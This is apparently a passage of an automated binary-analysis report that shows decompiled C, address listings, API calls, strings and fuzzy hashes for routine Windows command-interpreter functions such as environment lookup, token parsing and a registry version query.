0x003542bb
0x003542bd
0x003542bd
0x003542bd
0x003542c2
0x00354200
0x0035420a
0x0035425f
0x0035425f
0x00354265
0x00354272
0x0035426c
0x0035426c
0x0035426c
0x00354273
0x0035427a
0x00354286
0x00354289
0x0035428f
0x0035429e
0x003542a0
0x00000000
0x003542a0
0x00354291
0x00354294
0x00354296
0x003542a2
0x003542a2
0x003542a2
0x00354294
0x00000000
0x00000000
0x00000000
0x00000000
0x0035420c
0x0035420c
0x0035420f
0x00354215
0x0035422d
0x00000000
0x00000000
0x00000000
0x00000000
0x00354217
0x00354217
0x00354220
0x00354235
0x00354237
0x0035423d
0x00354242
0x00000000
0x00354244
0x00354244
0x00000000
0x00354244
0x00354222
0x00354222
0x00354222
0x00354222
0x00354220
0x00354215
0x0035420a
0x00000000
0x00000000
0x00000000
0x003541c6
0x003542d3
0x003542d3

APIs

iswdigit.MSVCRT ref: 003541B0
iswdigit.MSVCRT ref: 003541C9
wcstol.MSVCRT ref: 003541D9

Strings

C?5:, xrefs: 0035416B, 003541AF
aApP, xrefs: 00354171

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: iswdigit$wcstol
String ID: C?5:$aApP
API String ID: 644763121-2157318868
Opcode ID: 150b8d86437ce09c0d3dbc47c7e8a4f2aa4cf8f0117e3edce811141df033b544
Instruction ID: 820e382686ce6eb7d1b1d40c540b59c455cde6e2c15fea4dfb8e84fcf8dc3488
Opcode Fuzzy Hash: 150b8d86437ce09c0d3dbc47c7e8a4f2aa4cf8f0117e3edce811141df033b544
Instruction Fuzzy Hash: DE413735A0012286CF2D9F65D885A7EB3B5AF5530AF16482AFC46DB1A4E630CDCAC351

Uniqueness

Uniqueness Score: -1.00%

Function 00352BF0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00352BF0(void* __ecx, int* _a4) {
				void* _v0;
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short* _t25;
				void* _t30;
				void* _t38;
				WCHAR* _t40;
				int* _t41;
				void* _t46;
				void* _t50;
				signed int _t52;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t59;

				_t22 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t22 ^ _t59;
				_t41 = _a4;
				 *_t41 = 0;
				_t41[1] = 0;
				E00341040( &_v528, 0x104, __ecx);
				_t52 = 0x104;
				_t25 =  &_v528;
				while( *_t25 != 0) {
					_t25 = _t25 + 2;
					_t52 = _t52 - 1;
					if(_t52 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t46 =  ~_t52 & 0x00000104 - _t52;
				if(_t52 != 0) {
					_t40 =  &(( &_v528)[_t46]);
					_t58 = 0x104 - _t46;
					if(_t58 == 0) {
						L11:
						_t40 = _t40 - 2;
					} else {
						_t50 = 0x7ffffffe;
						_t52 = L"_p0" - _t40;
						while(_t50 != 0) {
							_t55 =  *(_t40 + _t52) & 0x0000ffff;
							if(_t55 == 0) {
								break;
							} else {
								 *_t40 = _t55;
								_t50 = _t50 - 1;
								_t40 =  &(_t40[1]);
								_t58 = _t58 - 1;
								if(_t58 != 0) {
									continue;
								} else {
									goto L11;
								}
							}
							goto L12;
						}
						if(_t58 == 0) {
							goto L11;
						}
					}
					L12:
					_t46 = 0;
					 *_t40 = 0;
				}
				_t57 = OpenSemaphoreW(0x1f0003, 0,  &_v528);
				_v532 = _t57;
				if(_t57 != 0) {
					_t52 =  &_v536;
					_v536 = 0;
					_t46 = _t57;
					_t30 = E0035213A(_t46, _t52);
					_t54 = _t30;
					if(_t30 >= 0) {
						asm("cdq");
						 *_t41 = _v536;
						_t41[1] = _t52;
						goto L19;
					} else {
						_t46 = _v0;
						_t52 = 0xce;
						E0035292C("wil", _t54);
						_t57 = _v532;
					}
				} else {
					if(GetLastError() == 2) {
						L19:
						_t54 = 0;
					} else {
						_t46 = _v0;
						_t52 = 0xc8;
						_t38 = E00352913("wil");
						_t57 = _v532;
						_t54 = _t38;
					}
				}
				if(_t57 != 0 && CloseHandle(_t57) == 0) {
					_push(_t46);
					_t52 = 0x879;
					E00352D56();
				}
				return E00346FD0(_t54, _t41, _v8 ^ _t59, _t52, _t54, _t57);
			}

0x00352bfb
0x00352c02
0x00352c06
0x00352c11
0x00352c19
0x00352c26
0x00352c2b
0x00352c2d
0x00352c33
0x00352c39
0x00352c3c
0x00352c3f
0x00000000
0x00000000
0x00000000
0x00352c3f
0x00352c49
0x00352c4b
0x00352c4f
0x00352c57
0x00352c5a
0x00352c5c
0x00352c8f
0x00352c8f
0x00352c5e
0x00352c63
0x00352c68
0x00352c70
0x00352c74
0x00352c7b
0x00000000
0x00352c7d
0x00352c7d
0x00352c80
0x00352c81
0x00352c84
0x00352c87
0x00000000
0x00352c89
0x00000000
0x00352c89
0x00352c87
0x00000000
0x00352c7b
0x00352c8d
0x00000000
0x00000000
0x00352c8d
0x00352c92
0x00352c92
0x00352c94
0x00352c94
0x00352cab
0x00352cad
0x00352cb5
0x00352cde
0x00352ce4
0x00352cee
0x00352cf0
0x00352cf5
0x00352cf9
0x00352d1c
0x00352d1d
0x00352d1f
0x00000000
0x00352cfb
0x00352cfb
0x00352cfe
0x00352d09
0x00352d0e
0x00352d0e
0x00352cb7
0x00352cc0
0x00352d22
0x00352d22
0x00352cc2
0x00352cc2
0x00352cc5
0x00352ccf
0x00352cd4
0x00352cda
0x00352cda
0x00352cc0
0x00352d26
0x00352d33
0x00352d37
0x00352d3c
0x00352d3c
0x00352d53

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00352CA5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00352CB7
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00352D29

Strings

wil, xrefs: 00352CCA, 00352D04
_p0, xrefs: 00352C5E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseErrorHandleLastOpenSemaphore
String ID: _p0$wil
API String ID: 3419097560-1814513734
Opcode ID: 5b3deb98ef572e45cdb840c87ed32ed68a049be1de90173de471e765f71f8cc7
Instruction ID: a98529136adee917742b47bfd2f41ef166de30b55dd3bcdeeaa954be0594e231
Opcode Fuzzy Hash: 5b3deb98ef572e45cdb840c87ed32ed68a049be1de90173de471e765f71f8cc7
Instruction Fuzzy Hash: 6341F871A001298BCB37DF24C945FAF37B5AB86701F158298EC099B265DB70DE498790

Uniqueness

Uniqueness Score: -1.00%

Function 00354588, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00354588(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short* _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t33;
				void* _t38;
				intOrPtr _t41;
				void* _t47;
				void* _t49;
				intOrPtr* _t50;
				signed int _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t58;
				void* _t59;

				_t33 =  *0x363834;
				_v20 = __ecx;
				if(_t33 != 0) {
					_t53 = E0033DF40(E0033DEF9(__ecx));
					_v12 = _t53;
					if(_t53 == 0) {
						L2:
						return 1;
					}
					_t47 = 0x20;
					_t23 = E00342349(_t53, _t47);
					if(_t23 != 0) {
						 *_t23 = 0;
					}
					_t50 = _t53;
					_v16 = 0;
					_t4 = _t50 + 2; // 0x2
					_t38 = _t4;
					do {
						_t24 =  *_t50;
						_t50 = _t50 + 2;
					} while (_t24 != 0);
					_t54 = _t33;
					_t52 = _t50 - _t38 >> 1;
					_v8 = 1;
					_t41 = _t54 + 2;
					do {
						_t25 =  *_t54;
						_t54 = _t54 + 2;
					} while (_t25 != 0);
					_t55 = _t54 - _t41;
					_t56 = _t55 >> 1;
					if(_t55 == 0) {
						L22:
						E0033C5A2(_t41, 0x400023a9, 1, _v20);
						L23:
						E00340040(_v12);
						return _v8;
					}
					while( *0x35d544 == 0) {
						if(_t56 < _t52) {
							L15:
							_t41 = _v8;
							L16:
							_t33 = _t33 + _t56 * 2 + 2;
							_t57 = _t33;
							_t49 = _t57 + 2;
							do {
								_t25 =  *_t57;
								_t57 = _t57 + 2;
							} while (_t25 != _v16);
							_t58 = _t57 - _t49;
							_t56 = _t58 >> 1;
							if(_t58 != 0) {
								continue;
							}
							L21:
							if(_t41 == 0) {
								goto L23;
							}
							goto L22;
						}
						__imp___wcsnicmp(_t33, _v12, _t52);
						_t59 = _t59 + 0xc;
						if(_t25 != 0) {
							goto L15;
						}
						_push(_t33);
						E003425D9(L"%s\r\n");
						_t41 = 0;
						_v8 = 0;
						goto L16;
					}
					_t41 = _v8;
					goto L21;
				}
				_push("Null environment");
				fprintf(E00347721(__ecx, 2), "\nCMD Internal Error %s\n");
				goto L2;
			}

0x00354591
0x00354599
0x003545a0
0x003545d2
0x003545d4
0x003545d9
0x003545be
0x00000000
0x003545c0
0x003545dd
0x003545e0
0x003545e7
0x003545eb
0x003545eb
0x003545ee
0x003545f2
0x003545f5
0x003545f5
0x003545f8
0x003545f8
0x003545fb
0x003545fe
0x00354605
0x00354609
0x0035460c
0x0035460f
0x00354612
0x00354612
0x00354615
0x00354618
0x0035461d
0x0035461f
0x00354621
0x00354681
0x0035468b
0x00354693
0x00354696
0x00000000
0x0035469b
0x00354623
0x0035462e
0x00354658
0x00354658
0x0035465b
0x0035465e
0x00354661
0x00354663
0x00354666
0x00354666
0x00354669
0x0035466c
0x00354672
0x00354674
0x00354676
0x00000000
0x00000000
0x0035467d
0x0035467f
0x00000000
0x00000000
0x00000000
0x0035467f
0x00354635
0x0035463b
0x00354640
0x00000000
0x00000000
0x00354642
0x00354648
0x00354651
0x00354653
0x00000000
0x00354653
0x0035467a
0x00000000
0x0035467a
0x003545a2
0x003545b5
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 00354635

Part of subcall function 00347721: __iob_func.MSVCRT ref: 00347726

fprintf.MSVCRT ref: 003545B5

Strings

CMD Internal Error %s, xrefs: 003545A7
%s, xrefs: 00354643
Null environment, xrefs: 003545A2

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: __iob_func_wcsnicmpfprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 1828771275-2781220306
Opcode ID: 67e5aff7df236fccf731f079338c7459090ae3fdf6e94adb8a3692a0ae1b4b8e
Instruction ID: aae7810a4269d7cfefcc619cc470ebe18e0a527d2d509cc128d3e7ff2ea8eca7
Opcode Fuzzy Hash: 67e5aff7df236fccf731f079338c7459090ae3fdf6e94adb8a3692a0ae1b4b8e
Instruction Fuzzy Hash: 81316C36E002119BCB3E9F689C81FAEB3B4DF45705F064569FC1AA7290FB705E898644

Uniqueness

Uniqueness Score: -1.00%

Function 0035579A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0035579A(void* __ecx, void* __eflags) {
				char* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				signed int _t13;
				short _t21;
				char* _t25;
				int _t29;
				short* _t32;
				void* _t35;
				short* _t37;
				short* _t41;
				int _t46;

				_push(__ecx);
				_t7 = E00347797(__ecx);
				if(_t7 != 0) {
					_t7 =  *0x37c018(0, 0);
					if(0 != 0) {
						_t28 = 0;
						_t41 = E003400B0(0);
						if(_t41 == 0) {
							L3:
							E00359287(_t28);
							__imp__longjmp(0x36b8b8, 1);
						}
						_t28 = 0;
						_t25 = E003400B0(0);
						_v8 = _t25;
						if(_t25 == 0) {
							goto L3;
						}
						if(E00347797(0) != 0) {
							 *0x37c018(0, _t25);
						}
						_t29 =  *0x363854;
						_t13 = E00340638(_t29);
						asm("sbb eax, eax");
						MultiByteToWideChar(_t29,  ~( ~_t13), _t25, 0xffffffff, _t41, 0);
						_t46 = SetErrorMode(1);
						if( *_t41 != 0) {
							_t35 = 0;
							do {
								E003433FC(0, _t41, _t35 + _t35, _t41, _t46, _t35 + _t35);
								_t32 = _t41;
								_t3 =  &(_t32[1]); // 0x2
								_t37 = _t3;
								do {
									_t21 =  *_t32;
									_t32 =  &(_t32[1]);
								} while (_t21 != 0);
								_t35 = 1;
								_t41 =  &(( &(_t41[_t32 - _t37 >> 1]))[1]);
							} while ( *_t41 != 0);
							_t6 =  &_v8; // 0x343a4e
							_t25 =  *_t6;
						}
						SetErrorMode(_t46);
						_t7 = E00340040(_t25);
					}
				}
				return _t7;
			}

0x0035579f
0x003557a3
0x003557aa
0x003557b4
0x003557be
0x003557c4
0x003557cc
0x003557d0
0x003557d2
0x003557d2
0x003557de
0x003557de
0x003557e4
0x003557eb
0x003557ed
0x003557f2
0x00000000
0x00000000
0x003557fb
0x003557ff
0x003557ff
0x00355805
0x0035580b
0x00355816
0x0035581d
0x0035582b
0x00355832
0x00355834
0x00355838
0x0035583c
0x00355841
0x00355843
0x00355843
0x00355846
0x00355846
0x00355849
0x0035584c
0x00355857
0x0035585b
0x0035585e
0x00355863
0x00355863
0x00355863
0x00355867
0x0035586f
0x0035586f
0x003557be
0x0035587a

APIs

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

longjmp.MSVCRT(0036B8B8,00000001,?,?,00343A4E,?,?,?,?,?,?,?,?), ref: 003557DE
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00343A4E), ref: 0035581D
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00343A4E), ref: 00355825
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00343A4E), ref: 00355867

Strings

N:4, xrefs: 00355863

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
String ID: N:4
API String ID: 162963024-2170049300
Opcode ID: 786fc6d72f175d3f83817e883adf83e67d50e828ff3192ad746fb123042d731a
Instruction ID: 53d6d9ebc4039b03c3933305f3ca9cfd6ba8e2adb5b2a0ea3760a08919a4d2c6
Opcode Fuzzy Hash: 786fc6d72f175d3f83817e883adf83e67d50e828ff3192ad746fb123042d731a
Instruction Fuzzy Hash: 3E2129357007019BD727AB748C55EBE775EDFC4311B064228FD0A9F261EE31AD4982A1

Uniqueness

Uniqueness Score: -1.00%

Function 003368D9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E003368D9(void* __ecx, intOrPtr __edx, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t16;
				signed int _t19;
				signed int _t21;
				intOrPtr _t24;
				signed int _t38;
				long _t40;
				signed short* _t44;

				_push(__ecx);
				_push(__ecx);
				_v12 = __edx;
				_t44 = E0033DEF9(__ecx);
				_t16 =  *_t44 & 0x0000ffff;
				if(_t16 != 0x3a) {
					if(_t16 != 0x2b) {
						goto L2;
					} else {
						goto L1;
					}
					L10:
					_t19 = _v8;
					 *((short*)(_v12 + _t19 * 2)) = 0;
					return _t19;
					L17:
				} else {
					L1:
					_t44 =  &(_t44[1]);
				}
				L2:
				_t24 = _a8;
				if(_t24 == 0) {
					_t44 = E0033DEF9(_t44);
				}
				_v8 = _v8 & 0x00000000;
				_t40 =  *_t44 & 0x0000ffff;
				while(_t24 == 0 || wcschr(L"=,;", _t40) == 0) {
					if(wcschr(L"+:\n\r\t ", _t40) == 0) {
						if(_t24 == 0) {
							if(E0033D7D4(L"&<|>", _t40) == 0) {
								if(_t40 != 0x5e) {
									goto L8;
								} else {
									_t44 =  &(_t44[1]);
									_t38 =  *_t44 & 0x0000ffff;
									goto L9;
								}
								goto L17;
							}
						} else {
							L8:
							_t38 = _t40 & 0x0000ffff;
							L9:
							_t32 = _v8;
							_t44 =  &(_t44[1]);
							_t7 = _t32 + 1; // 0x1
							_t21 = _t7;
							 *(_v12 + _v8 * 2) = _t38;
							_t40 =  *_t44 & 0x0000ffff;
							_v8 = _t21;
							if(_t21 < 0x7f) {
								continue;
							}
						}
					}
					goto L10;
				}
				goto L10;
			}

0x003368de
0x003368df
0x003368e3
0x003368eb
0x003368ed
0x003368f3
0x00336970
0x00000000
0x00336972
0x00000000
0x00336972
0x00336958
0x00336958
0x00336963
0x0033696a
0x00000000
0x003368f5
0x003368f5
0x003368f5
0x003368f5
0x003368f8
0x003368f8
0x003368fd
0x0034be67
0x0034be67
0x00336903
0x00336907
0x0033690a
0x00336930
0x00336934
0x0034be7c
0x0034be86
0x00000000
0x0034be8c
0x0034be8c
0x0034be8f
0x00000000
0x0034be8f
0x00000000
0x0034be86
0x0033693a
0x0033693a
0x0033693a
0x0033693d
0x0033693d
0x00336940
0x00336946
0x00336946
0x00336949
0x0033694d
0x00336950
0x00336956
0x00000000
0x00000000
0x00336956
0x00336934
0x00000000
0x00336930
0x00000000

APIs

Part of subcall function 0033DEF9: iswspace.MSVCRT ref: 0033DF07
Part of subcall function 0033DEF9: wcschr.MSVCRT ref: 0033DF18

wcschr.MSVCRT ref: 00336914
wcschr.MSVCRT ref: 00336926

Strings

+: , xrefs: 00336921
&<|>, xrefs: 0034BE70
=,;, xrefs: 0033690F

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$iswspace
String ID: &<|>$+: $=,;
API String ID: 3458554142-2256444845
Opcode ID: e2663c82527fa53a0a559dd34c07d40e837356fa8b13c8368f135a264e476b34
Instruction ID: 5ea6e80f4ea90bb14c2fd3b2f61c029cd9348134ce231470d3992d2c25e9101c
Opcode Fuzzy Hash: e2663c82527fa53a0a559dd34c07d40e837356fa8b13c8368f135a264e476b34
Instruction Fuzzy Hash: E9213A72A04265FEC7368B26D4967BEB7E9EFE5360F26815AE9C4DB280E7314C40D350

Uniqueness

Uniqueness Score: -1.00%

Function 00334476, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00334476() {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				long _t17;
				int _t20;

				_t20 = 4;
				_v16 = _t20;
				if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x2000000,  &_v8) != 0) {
					L5:
					return 0;
				}
				_v12 = _t20;
				_t17 = RegQueryValueExW(_v8, L"UBR", 0,  &_v12,  &_v20,  &_v16);
				RegCloseKey(_v8);
				if(_t17 != 0 || _v12 != _t20) {
					goto L5;
				} else {
					return _v20;
				}
			}

0x00334481
0x00334485
0x003344a2
0x003344e1
0x00000000
0x003344e1
0x003344a8
0x003344be
0x003344c9
0x003344d2
0x00000000
0x003344d9
0x00000000
0x003344d9

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 0033449A
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 003344BE
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 003344C9

Strings

Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00334490
UBR, xrefs: 003344B6

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
API String ID: 3677997916-3870813718
Opcode ID: e37d00f5a16bce31ac55386586bb81613b13c30d47d7465189631cf35ec8dadb
Instruction ID: 4309d9ce5bcbcc6b1a64528ea4eb6bedb1583eaad518792feb215feb2dafcdb0
Opcode Fuzzy Hash: e37d00f5a16bce31ac55386586bb81613b13c30d47d7465189631cf35ec8dadb
Instruction Fuzzy Hash: 57016D76A8021CFBDB329B95DC89FEEBBBCEB84710F100566E905A2161D6306E80DA50

Uniqueness

Uniqueness Score: -1.00%

Function 0034465D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0034465D(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				int _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t3 ^ _t20;
				_t18 =  *0x35d5f8; // 0x0
				if(_t18 != 0) {
					L6:
					 *0x3794b4(0);
					_t6 =  *_t18();
					L7:
					_pop(_t19);
					return E00346FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
				}
				_t8 =  *0x35d0d0; // 0xffffffff
				if(_t8 != 0xffffffff) {
					L3:
					if(_t8 != 0) {
						_t18 = GetProcAddress(_t8, "SetThreadUILanguage");
						 *0x35d5f8 = _t18;
					}
					L5:
					if(_t18 == 0) {
						_t6 = SetThreadLocale(0x409);
						goto L7;
					}
					goto L6;
				}
				_t8 = GetModuleHandleW(L"KERNEL32.DLL");
				_t18 =  *0x35d5f8; // 0x0
				 *0x35d0d0 = _t8;
				if(_t8 == 0xffffffff) {
					goto L5;
				}
				goto L3;
			}

0x00344662
0x00344663
0x0034466a
0x0034466e
0x00344676
0x003446bd
0x003446c1
0x003446c7
0x003446c9
0x003446ce
0x003446d7
0x003446d7
0x00344678
0x00344680
0x0034469d
0x0034469f
0x003446ad
0x003446af
0x003446af
0x003446b5
0x003446b7
0x0034e8ad
0x00000000
0x0034e8ad
0x00000000
0x003446b7
0x00344687
0x0034468d
0x00344693
0x0034469b
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,00344533), ref: 00344687
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,00344533), ref: 003446A7

Strings

KERNEL32.DLL, xrefs: 00344682
SetThreadUILanguage, xrefs: 003446A1

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$SetThreadUILanguage
API String ID: 1646373207-2530943252
Opcode ID: 00085527d7dc90820eee62ecde8ee5e6a45669b0f99ad18feaeccc570eeffb7b
Instruction ID: 3fff05b2cd5ae4116d786814a927fbc3636aab4d46ec33c3ab657be82ef6e22e
Opcode Fuzzy Hash: 00085527d7dc90820eee62ecde8ee5e6a45669b0f99ad18feaeccc570eeffb7b
Instruction Fuzzy Hash: 1201A770A003259BC7239F24AC49B5A37EC9B06729F430765F815DF2E0DB746C418691

Uniqueness

Uniqueness Score: -1.00%

Function 00341F52, Relevance: 7.8, APIs: 5, Instructions: 293
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00341F52(void* __ebx, wchar_t* __ecx, wchar_t* __edx, void* __edi, void* __esi, void* __eflags) {
				wchar_t* _t92;
				void* _t104;
				void* _t108;
				wchar_t* _t110;
				wchar_t** _t111;
				long _t117;
				short* _t118;
				void _t121;
				void* _t123;
				long _t128;
				wchar_t* _t130;
				wchar_t* _t137;
				void* _t146;
				wchar_t** _t155;
				wchar_t** _t158;
				void _t164;
				wchar_t* _t168;
				void _t171;
				intOrPtr _t175;
				long* _t180;
				void* _t188;
				signed int _t191;
				void _t199;
				void* _t203;
				void* _t204;
				wchar_t** _t205;
				long* _t206;
				void* _t207;
				wchar_t* _t209;
				long* _t217;
				void _t218;
				signed int _t220;
				wchar_t* _t223;
				void _t224;
				wchar_t* _t225;
				void* _t226;

				_push(0xc0);
				_push(0x35bdb8);
				E003475CC(__ebx, __edi, __esi);
				_t216 = __edx;
				_t223 = __ecx;
				 *(_t226 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t226 - 0xc4)) = __edx;
				_t92 =  *(_t226 + 0xc);
				 *(_t226 - 0xc0) = _t92;
				 *(_t226 - 0xb8) = _t92;
				 *((intOrPtr*)(_t226 - 0xb4)) = 0x90;
				 *((intOrPtr*)(_t226 - 0xb0)) = 5;
				memset(_t226 - 0xac, 0, 0x88);
				 *((intOrPtr*)(_t226 - 0xcc)) = 0;
				_t155 =  *0x373cc4;
				_t155[0xc] = 0;
				 *0x35d0da = 0;
				 *((intOrPtr*)(_t226 - 4)) = 0;
				 *(_t226 - 0xac) =  *(_t226 - 0xc0);
				_push(0x3a);
				if( *0x373cc9 == 0) {
					_pop(_t224);
				} else {
					_pop(_t224);
					if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x38)))) == _t224) {
						 *(_t226 - 0xac) =  *(_t155[0x44]);
					}
				}
				if(E00347797(_t155) == 0) {
					_t157 = 1;
					goto L5;
				} else {
					 *((intOrPtr*)(_t226 - 0xc8)) = 0;
					_t146 =  *0x37c010(_t226 - 0xb4, _t226 - 0xcc,  &(( *0x373cc4)[0xc]), _t216, _t226 - 0xc8);
					_t157 = 1;
					if(_t146 == 1) {
						__eflags =  *((intOrPtr*)(_t226 - 0xc8)) - 1;
						if( *((intOrPtr*)(_t226 - 0xc8)) == 1) {
							_push(0);
							_push(0x4ec);
							E0033C5A2(1);
							_t157 = 1;
							__eflags = 1;
						}
						 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
						L36:
						return E00347614(0, _t216, _t224);
					}
					L5:
					 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
					_t199 =  *(_t226 - 0xc0);
					 *0x35d0da = _t157;
					_t158 =  *0x373cc4;
					_t158[2] = 0;
					 *_t158 = _t216;
					_t97 =  *(_t226 + 8);
					_t158[1] =  *(_t226 + 8);
					if( *0x373cc9 == 0) {
						L39:
						__eflags = E00342D22(_t216, _t97, _t199);
						if(__eflags == 0) {
							goto L9;
						}
						goto L49;
					} else {
						_t137 =  *(_t226 - 0xbc);
						_t235 =  *(_t137[0xe]) - _t224;
						if( *(_t137[0xe]) != _t224) {
							_t97 =  *(_t226 + 8);
							goto L39;
						}
						_t225 = _t158[0x44];
						E00341040(_t216,  *(_t226 + 8),  *_t225);
						( *0x373cc4)[2] = _t225[2];
						L9:
						_t216 = 0x2000;
						E00342A7C(_t226 - 0xc0, 0x2000, _t235);
						_t224 =  *(_t226 - 0xc0);
						if(_t224 == 0) {
							_push(0);
							L48:
							__imp__??_V@YAXPAX@Z();
							L49:
							goto L36;
						}
						E00341040(_t224, 0x2000, ( *(_t226 - 0xbc))[0xe]);
						_t164 = _t224;
						_t203 = _t164 + 2;
						do {
							_t104 =  *_t164;
							_t164 = _t164 + 2;
						} while (_t104 != 0);
						_t168 = _t224 + ((_t164 - _t203 >> 1) + 1) * 2;
						 *(_t226 - 0xb8) = _t168;
						 *_t168 = 0;
						_t106 =  *(_t226 - 0xbc);
						if(( *(_t226 - 0xbc))[0xf] != 0) {
							_t216 = 0x2000 - (_t168 - _t224 >> 1);
							E00341040(_t168, 0x2000, _t106[0xf]);
						}
						E00342A06(( *0x373cc4)[3], _t216);
						_t171 = _t224;
						_t204 = _t171 + 2;
						do {
							_t108 =  *_t171;
							_t171 = _t171 + 2;
						} while (_t108 != 0);
						( *0x373cc4)[0x19] = _t171 - _t204 >> 1;
						_t110 = E0033DF40(_t224);
						_t205 =  *0x373cc4;
						_t205[0xf] = _t110;
						if(_t110 == 0) {
							L50:
							_push(_t224);
							goto L48;
						}
						_t205[0x23] = _t110;
